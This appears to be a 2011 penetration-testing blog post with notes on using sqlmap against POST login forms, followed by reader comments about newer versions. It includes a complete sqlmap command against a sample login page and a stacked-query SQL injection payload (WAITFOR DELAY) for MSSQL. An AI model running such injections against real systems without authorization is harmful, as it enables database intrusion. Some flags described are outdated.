Monday, March 21, 2011

sqlmap with POST requests


Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string

--postfix=POSTFIX <-- Injection payload postfix string

--dbms=DBMS <--Force back-end DBMS to this value

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request


user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
CG

6 comments:

dre said...

Some of these, such as "--method" are deprecated in the new version of sqlmap (out last week). See the new version 0.9 for details. You may want to check out the "--forms" flag as well as tons of other new ones.

I suggest starting with the ChangeLog and the new documentation

CG said...

well aint that a bitch...damn you active development process mucking with my shitty personal documentation!

thanks for the heads up on that dre

one of authors said...

everybody should checkout the latest revision from sqlmap's repository (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev) because the project has evolved a lot in the past year

Ficti0n said...

I have yet to have Post functionality work correctly with SQLMap. Generally when I find a POST Request and verify it manually I hunt around for a get request sqli if I am using sqlmap just because it usually fails horribly with POSTS..
I will have to check out the svn repository and maybe they have fixed this issue as well.

Anonymous said...

UPDATES: http://hackertarget.com/sqlmap-post-request-injection/

Anonymous said...

Nice but not the perfect way. What if headers contain POST data in JSON format and the website is using AJAX for making communications with the server. Obviously, server respond with 403 Error as response.